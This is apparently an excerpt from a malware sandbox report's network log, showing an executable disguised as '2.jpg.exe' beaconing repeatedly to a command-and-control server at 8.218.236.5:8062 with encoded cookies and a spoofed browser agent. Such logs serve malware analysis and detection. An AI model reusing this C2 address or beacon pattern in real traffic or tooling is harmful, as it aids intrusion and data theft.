Apr 19, 2024 09:52:27.701443911 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:28.025849104 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
189	192.168.2.4	49925	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:28.465812922 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:28.790740967 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
190	192.168.2.4	49926	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:29.243601084 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:29.579864025 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
191	192.168.2.4	49927	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:30.028543949 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:30.367630005 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
192	192.168.2.4	49928	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:30.808881998 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:31.132325888 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
193	192.168.2.4	49929	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:31.562628984 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:31.889624119 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
194	192.168.2.4	49930	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:32.334156036 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:32.667088032 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
195	192.168.2.4	49931	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:33.107034922 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:33.430491924 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
196	192.168.2.4	49932	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:33.866564989 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:34.184277058 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
197	192.168.2.4	49933	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:34.614834070 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:34.932607889 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
198	192.168.2.4	49934	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:35.367280960 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:35.688584089 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
199	192.168.2.4	49935	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:36.126899004 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:36.444078922 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
200	192.168.2.4	49936	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:36.870925903 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:37.188891888 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
201	192.168.2.4	49937	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:37.626458883 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:37.953973055 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
202	192.168.2.4	49938	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:38.388084888 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:38.713538885 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
203	192.168.2.4	49939	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:39.146315098 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:39.463151932 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
204	192.168.2.4	49940	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:39.914557934 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:40.244908094 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
205	192.168.2.4	49941	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:40.685718060 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:41.005141020 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
206	192.168.2.4	49942	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:41.458304882 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:41.794555902 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
207	192.168.2.4	49943	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:42.764543056 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:43.104106903 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
208	192.168.2.4	49944	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:43.546942949 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:43.870317936 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
209	192.168.2.4	49945	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:44.306241035 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:44.628108025 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
210	192.168.2.4	49946	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:45.068571091 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:45.401835918 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
211	192.168.2.4	49947	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:45.835072041 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:46.154726028 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
212	192.168.2.4	49948	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:46.593358040 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:46.921005011 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
213	192.168.2.4	49949	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:47.359139919 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:47.689003944 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
214	192.168.2.4	49950	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:48.120630026 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:48.440165043 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
215	192.168.2.4	49951	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:48.871169090 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:49.197717905 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
216	192.168.2.4	49952	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:49.649087906 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:49.978533983 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
217	192.168.2.4	49953	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
